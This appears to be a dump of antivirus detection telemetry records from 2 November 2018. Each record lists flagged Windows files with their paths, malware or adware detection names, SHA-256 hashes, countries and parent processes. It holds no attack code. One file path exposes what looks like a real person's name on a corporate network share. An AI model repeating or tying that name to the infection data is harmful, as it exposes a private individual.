  Row(detection=Row(filename='gccustomhook.exe', filepath='C:\\Program Files (x86)\\Common Files\\Adobe\\OOBE\\PDApp\\AdobeGCClient\\customhook\\gccustomhook.exe', filesize=1976000, name='W32/Sality.AT.#M1.#R1'), hash='712a5908ea66f2cd486d0fe6a8050096a6a75cd68d168788aeca5883f0a588b9', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:WRBzKCC4A0aNQ2rv.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T21:12:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104714-2a9338fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-104714-2A9338FC', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='366f8b30d41e00f2ca1e0eafb82016a536c1b189c0360440525626dfa51c89be', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:49:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0004d20c', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp0004d20c', filesize=6144000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='34f8121af01718e8f825b72cdc5205f4048ae3f29a6be7bb917d589c2d8a831d', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T05:49:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='birforms.exe', filepath='C:\\eBIRForms\\BIRForms.exe', filesize=30912000, name='W32/Sality.AT.#M1.#R1'), hash='1511090e5bb6ca6135675bf11411b7453f8934ab98e89eeab987cee50e479829', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\NVIDIA Corporation\\Update Core\\NvBackend.exe', parentsize=2655520, timestamp='2018-11-02T02:12:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-001832-d1273a3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_267b6185\\AVSCAN-20181102-235252-420EE3D5\\AVSCAN-20181103-001832-D1273A3B', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:18:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='media.bat', filepath='C:\\Users\\X\\Recorded TV\\Sample Media\\Media.bat', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ioc512d889d-a5dd-b34f-90cf-c59e9527f232.exe', filepath='C:\\programdata\\kaspersky lab\\avp18.0.0\\temp\\ioc512D889D-A5DD-B34F-90CF-C59E9527F232.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T19:45:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gta3_vicecityv11megatrainer-trsi.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\TRENER\\GTA3_ViceCityv11Megatrainer-TRSI\\GTA3_ViceCityv11Megatrainer-TRSI.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-213213-3609c1f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e5115e9e\\AVSCAN-20181102-213126-2D71625F\\AVSCAN-20181102-213213-3609C1F2', filesize=448000, name='Adware/FileTour.wry.#M1.#R1'), hash='07f5273a5ad4248030d732407f1a18edbadb1a63d281200a63e09b75c30185eb', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3721032, timestamp='2018-11-02T22:32:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3dcc0f2f4a6c71d24c105c22ea053e1482f419f5aa927888f358eb1c72c564c4', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T08:10:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194218-4f524a36', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-193911-3877A267\\AVSCAN-20181102-194218-4F524A36', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:42:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='I:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T12:46:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='th.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\th\\th.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0126997.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0126997.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0ba07dcc666c77ab9c3af399c1d46d1651616c4fdcea0db4efa33e7088e57942', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0BA07DCC666C77AB9C3AF399C1D46D1651616C4FDCEA0DB4EFA33E7088E57942', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='0ba07dcc666c77ab9c3af399c1d46d1651616c4fdcea0db4efa33e7088e57942', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:24:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='f:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4674872, timestamp='2018-11-02T10:15:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054652-ab16d131', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054652-AB16D131', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054712-b739286c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054712-B739286C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051533-4b13a391', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051533-4B13A391', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050800-3d1b2377', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050800-3D1B2377', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='52ddc21dd94dffdfaf2cff0bef8e20129f46d2a0594af38c71b68ad3da57153e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:54:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\DriverGenius\\Setup (1)\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:45:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055217-6cfa6d72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055217-6CFA6D72', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053231-aa3dc682', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053231-AA3DC682', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='final.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Cooler\\final\\final.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='51636ec1b5e4820e85f5edc9d934225779cba2d31f0cf9a99d78fa7e1cb953cb', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000075d4', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp000075d4', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T15:50:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062313-bf554a6f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062313-BF554A6F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160509-259841c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-160509-259841C7', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:08:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101727-8153b507', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2326205d\\AVSCAN-20181102-101711-7DF8735D\\AVSCAN-20181102-101727-8153B507', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:17:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054256-1ee8bc66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054256-1EE8BC66', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131755-dd349354', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-131755-DD349354', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:21:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='\\\\Srv-adc\\users$\\Marius.Stoleriu\\Desktop\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T05:40:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154502-4549207a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-154502-4549207A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:48:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-172304-e69494e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c51592d9\\AVSCAN-20181102-172220-C1034BD0\\AVSCAN-20181102-172304-E69494E2', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:23:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00000790', filepath='C:\\Windows\\Temp\\tmp00000111\\tmp00000790', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T21:45:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055853-591aecb6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055853-591AECB6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061355-72d8a04f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061355-72D8A04F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055615-fababd51', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055615-FABABD51', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052814-110ec40b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052814-110EC40B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:13Z'), dt=datetime.date(2018, 11, 2)),
